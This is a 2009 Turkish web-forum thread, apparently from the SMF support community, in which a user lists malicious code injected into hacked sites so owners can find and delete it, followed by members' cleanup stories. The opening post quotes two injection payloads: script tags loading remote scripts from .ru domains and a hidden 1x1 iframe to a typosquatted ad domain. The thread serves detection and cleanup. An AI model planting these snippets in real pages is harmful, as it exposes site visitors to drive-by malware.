News:

Bored?  Looking to kill some time?  Want to chat with other SMF users?  Join us in IRC chat or Discord

Main Menu

Dosyalarınıza bulaşan trojan kod çeşitleri

Started by husmen73 (Gulhin), March 08, 2009, 06:33:32 AM

Previous topic - Next topic

husmen73 (Gulhin)

Web sitenize girerken "bu site saldırgan olarak belirlenmiş" diye bir uyarı mı alıyorsunuz?

Burada, dosyalarınıza bulaşabilecek zararlı kodları bulabilir ve bunları sitenizdeki tüm dosyaların kodlarında arayıp silerek çözüme kavuşabilirsiniz. Zararlı kodların temizlenmesinden sonra "bu site saldırgan olarak belirlenmiş" uyarısının gitmesi biraz zaman alabilir.

Zararlı Kod #1
Code (Bu kod genellikle </body> etiketinden önce eklenir.) Select
<script src=http://www.netcfg9.ru/script.js></script><script src=http://www.chk06.ru/script.js></script><script src=http://www.chk06.ru/script.js></script><script src=http://www.chk06.ru/script.js></script>

Zararlı Kod #2
Code (Bu kod genellikle </html> etiketinden sonra eklenir.) Select

<iframe src="http://goooogleadsence.biz/?click=1C95CF" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>



Not: Eğer bu tür zararlı kodları biliyorsanız lütfen gösterdiğim gibi mesajınıza ekleyiniz.

Önemli not: Zararlı kodları temizleme hakkında destek vermiyoruz, bu konu sadece bilgilendirme amaçlı açılmıştır.




-Kurumsal Kimlik Web Tasarım Hizmeti.
Gülhin Portal Sistemi hakkında yorumlarınızı bekliyorum.
SMF
Referanslar --> http://www.gulhin.com/referanslar-portfoy/
-Web Tasarımı ve Tema Tasarımı Sitesi www.gulhin.com
-TOPLU MAİL GÖNDERİMİ --> http://www.toplumailsms.com
E-Ticaret Sistemi yaptırmak mı istiyorsunuz?

harunkaraca

ya bu ruslar iyice canımı sıkmaya başladı !
botlar artık görsel dogrulamayıda geçiyor sanırım 1.1.8 sitemin birindee sürekli üye siliyordum :s
adult sitelerin reklamını veya linklerini yayınlamak için konu bile açıyorlar :))
bu adresleri tespit edip cpanel den ip adreslerini banlayarak kurtuldum.

Paragaya

Geri Döndüm :D...... :)

Tp.Net Turkish Moderator... ;)


agguvenligi

Çok iyi bir bilgilendirme olmuş bazı arkadaşlarımda bu problem vardı kod temizliği yaparak halletmiştik.
Gerçeği aramak onu bulmaktan daha kıymetlidir...
____________________________________
Dodge Check Engine Light | Yeni Private Serverlar | Gsm Destek

karadenizkaplani

EFET OLUYOR PANEL GİRDİĞİMDE REKLAM ÇIKIYOR...
www.eforumcu.com

www.karadenizkaplani.info

Tias_

bu kod bilgisayarınızada bulaşıyor bilginize.Bilgisayarınıza format atın daha sonra ftp'den index.php'lerin hepsini indirip en altına bulunan bu kodları silip tekrar upload ediniz.

baycall

İşte şu index  olayında yanılıyorsunuz arkadaşlar sadece indexde var zannediyordum..2 gün evvel ama sadece indexde değil lood.php,ssi,ssi.example falan herşeye bulaşmış temizlemek bir hayli zaman aldı iframe bir koddu...burada arkadaşların dediklerini yaptım hepsini sildim bilgisayarımı tarattım öncesinde sonra format attım yine virüs taraması yaptım ve dosyaları atar atmaz şifremi değiştirdim..

«['BrKDmRcN']»

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>

</body> den önce buda ekleniyor bunuda ekleyebilir misiniz?

Yağız...


Evo™

@«['BrKDmRcN']» verdiğin kod Google Analytics'e ait ve virüs değil.

«['BrKDmRcN']»

O kodu ekleyince avast siteye girdirmiyor ama şimdi onu silince şuan o uyarı çıkmıyor.

ayesoft

Quote from: «['BrKDmRcN']» on April 07, 2009, 06:16:14 AM
O kodu ekleyince avast siteye girdirmiyor ama şimdi onu silince şuan o uyarı çıkmıyor.
analytics.com google 'ın webmasterlara ücretsiz sunduğu normalde aylık 300/400 $ değerindeki bir sistemdir.

Sitenizin detaylı hit v.b. bilgilerini tutar bunun içinde bütün sayfalarda çalışacak bir kod eklenmesi gerekir ve yine bu kodu google değil webmaster kendisi koyar sitesine ve genelde smfde index.templateye ekleriz biz bu kodu. Yani konu kendiliğinden eklenen kodlarla ilgili verdiğin kodu google asla kendi eklemez ;)

pandemi001

#13
hxxp:goooogleadsence.biz [nonactive]

bu linke bende rastladım beta 4 kulanıyordum siteyi komple silip rc1 kurdum :)

hukuk (judge)

Selamlar Sn. Tsey - husmen73 (Gulhin) ,
Bazı bilgisayarlardan siteme giriş yapıldığında virüs uyarısı alınıyormuş. Bu kodların sitemize bulaşıp bulaşmadığını nasıl anlayabiliriz?
Saygılar

FinaLonLine

bu Kodlar ben Baya Bi yormustu :) Sitem Direk Googledeki Linkimden Dağıtıyordu Trojeni ve 360 tane Trojen sallıyordu bilgisayara :) Ama işin tuhafı sadece googledki linkimden dağıtıyordu trojeni normal expolerden bişey yoktu forumun yedeğini alıp sildim ve tekrar kurdum bişey kalmadı ama bu trojen sitemi bi anda googledki yerimden 15 sayfa geri attı baya deli bir trojenmiş :D simdi bişey yok ama Şüphelendiğim tek sey ntv haberden cekmem oldunu sanıyorum cunku ntv haber sitesi siteadvisordede kara listede viruslü olarak gorunuyor kullanan arkadaşlar varsa değiştirsinler  ;D
www.FinaLonLine.Net [nofollow]

husmen73 (Gulhin)

Quote from: hukuk on April 13, 2009, 04:13:05 PM
Selamlar Sn. Tsey - husmen73 (Gulhin) ,
Bazı bilgisayarlardan siteme giriş yapıldığında virüs uyarısı alınıyormuş. Bu kodların sitemize bulaşıp bulaşmadığını nasıl anlayabiliriz?
Saygılar
Sitenize girişlerde virüs uyarısı alıyosanız zaten bulaşmış demektir. Ben avast home kullanıyorum, bana bayağı yardımı dokunuyor. Bu program ile sitenizin tüm dosyalarını taratabilirsiniz (öncelikle FTP'deki tüm dosyaları bilgisayarınıza indirip, taramayı yapın)  Ayrıca http://safety.live.com (Online Tarama) adresinden de kendi bilgisayarınızı zararlı içeriklerden temizleyebilirsiniz.
-Kurumsal Kimlik Web Tasarım Hizmeti.
Gülhin Portal Sistemi hakkında yorumlarınızı bekliyorum.
SMF
Referanslar --> http://www.gulhin.com/referanslar-portfoy/
-Web Tasarımı ve Tema Tasarımı Sitesi www.gulhin.com
-TOPLU MAİL GÖNDERİMİ --> http://www.toplumailsms.com
E-Ticaret Sistemi yaptırmak mı istiyorsunuz?

turanordusu.tc

Ben geçen forum u komple indirip, öyle tarama yaptım esed nod32 ile. En doğru olanı da bu galiba, sonra yine aynı yere atıyorsunuz forum u. :)

The-Hatip

Kardeşim avast filan boş. Bilgisayarında Başlat > Çalıştır > Msconfig yaz başlangıça gel eğer ntos.exe yazıyorsa tamamdır o bilgisayardan her ftp ye girdiğinizde şifrenizi alır ve her index.php veya index.html veya default isimli dosyaları indexler o yüzden hosting firmaları da anlayamaz benim başıma geldi sorunu anca kendim çözdüm. Hosting firmanızın yapacağı bir iş kalmıyor zaten direk forumun yedeğini alıp silin daha sonra tekrar kurun fakat başka bir pc den yani ntos.exe bulunmayan bi pc den saygılarımla...

turanordusu.tc

Quote from: The-Hatip on April 19, 2009, 03:00:04 PM
Kardeşim avast filan boş. Bilgisayarında Başlat > Çalıştır > Msconfig yaz başlangıça gel eğer ntos.exe yazıyorsa tamamdır o bilgisayardan her ftp ye girdiğinizde şifrenizi alır ve her index.php veya index.html veya default isimli dosyaları indexler o yüzden hosting firmaları da anlayamaz benim başıma geldi sorunu anca kendim çözdüm. Hosting firmanızın yapacağı bir iş kalmıyor zaten direk forumun yedeğini alıp silin daha sonra tekrar kurun fakat başka bir pc den yani ntos.exe bulunmayan bi pc den saygılarımla...
Burda ; genel, SYSTEM.INI, WIN.INI, BOOT.INI Gibi bölümler var. Hangisinde ne yapmamız gerekiyor anlayamadım ben bunu.. :)

Advertisement: